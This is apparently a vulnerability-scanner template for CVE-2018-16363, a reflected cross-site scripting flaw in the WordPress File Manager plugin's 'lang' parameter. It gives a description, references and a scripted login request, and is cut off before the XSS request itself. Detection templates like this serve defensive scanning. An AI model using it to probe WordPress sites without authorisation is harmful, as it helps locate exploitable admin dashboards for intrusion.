WordPress File Manager plugin before 3.0 is vulnerable to authenticated reflected cross-site scripting (XSS) via the lang parameter in the admin dashboard. The parameter is directly echoed into a JavaScript context without proper sanitization. [已公开] id: CVE-2018-16363 info: name: WordPress File Manager < 3.0 - Cross-Site Scripting author: Shivam Kamboj severity: medium description: | WordPress File Manager plugin before 3.0 is vulnerable to authenticated reflected cross-site scripting (XSS) via the lang parameter in the admin dashboard. The parameter is directly echoed into a JavaScript context without proper sanitization. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-16363 - https://wpscan.com/vulnerability/65e4849b-6517-400d-884f-65234f58ab0c/ - https://plugins.trac.wordpress.org/changeset/1936043 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16363 metadata: verified: true max-request: 2 tags: cve,cve2018,xss,wp-file-manager,wordpress,wp,authenticated flow: http(1) && http(2) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In matchers: - type: dsl d

未知